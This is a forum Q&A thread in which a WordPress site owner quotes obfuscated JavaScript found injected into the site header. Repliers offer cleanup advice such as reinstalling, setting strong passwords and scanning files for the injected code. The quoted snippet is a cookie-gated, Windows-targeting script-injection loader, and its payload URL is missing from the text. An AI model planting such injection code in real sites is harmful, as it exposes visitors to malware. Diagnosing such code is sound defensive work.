tags:

views:

69

answers:

2
+1  Q: 

What is this? Google analytics cookie or malware?

I have a WordPress installation that has been targeted quite heavily by a phishing operation. I thought I had the security mostly covered except I found this in the header:

var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('<\/script>')};

That URL at the the end is super suspicious. I googled but found no leads :-(

I haven't yet found the source of the code in my WP installation. It's not written into the template files or database. In the process of updating WP install now.

Does anyone have any knowledge of this?

A: 

That looks strange to me. Maybe try reinstalling wordpress and choose very complex passwords so nobody unauthorized can access your site. You might want to remove the google analytics code from the page and see if that makes a difference. Complex passwords include numbers, uppercase and lowercase letters, slashes and anything else you can think of. Make sure it is longer then 8 letters. If your site is infected, take it down from the web NOW until your sure it's not.

alexy13  2010-08-27 22:33:13
All the passwords have been changed to 20 character strings. Said javascript was disabled and site has been deactivated but had trouble finding the root of the problem.
Niels Oeltjen  2010-08-28 02:26:33
A: 

Randomly check some of the wordpress install files. My ftp password was leaked. I use my girlfriends laptop once and saved the password. She must have downloaded some malware that captured the passwords. The result was that javascript was injected into pretty much any file with a standard web extension. Then any page you could browse to was attempting to redirect the user to some russian site. Checking the site in chrome showed a malware warning. The code I saw was more obfuscated than what you are seeing, but I would check into it. I ended up changing all passwords and running a script to check every file on the server for the footprint I was seeing and remove it. That seems to have worked out for me. If it is too complicated contact your host and have them look at that account.

spyderman4g63  2010-08-28 18:58:47

related questions

What's the best way to develop against WordPress on Windows when you already have IIS/SQL Server installed?
How do I use SCM with a PHP app such as Wordpress?
Getting IIS6 to play nice with WordPress Pretty Permalinks
YouTube embeds not working in WordPress after import from Blogger
Wordpress.. Is it a CMS?
How should a blog be structured to easily extract its data?
What database privileges does a Wordpress Blog really need?
What's the best way to run Wordpress on the same domain as a Rails application?
Is the syntax for the Wordpress style.css template element available anywhere?
How do you add a JavaScript widget to a Wordpress.com hosted blog?
What is the best CSS grid framework that integrates with Wordpress?
Using Apache mod_rewrite to remove sub-directories from URL
Joomla Blog/Wordpress Integration
Running a scheduled task in a Wordpress plug-in
Wordpress Category Template Question
Wordpress MediaWiki Cookie Integration
Preview theme in Wordpress
Seeking code highlighter recommendation for WordPress
Wordpress MediaWiki Integration
How do I list all Entries with a certain tag in Wordpress?
Mysql: Using "AND" Operation on tags and categories tables in Wordpress
How do I display database query statistics on Wordpress site?
Resources on wordpress theme-development
What is best blogging host for programmers/code formatting?
Wordpress theme development offline tools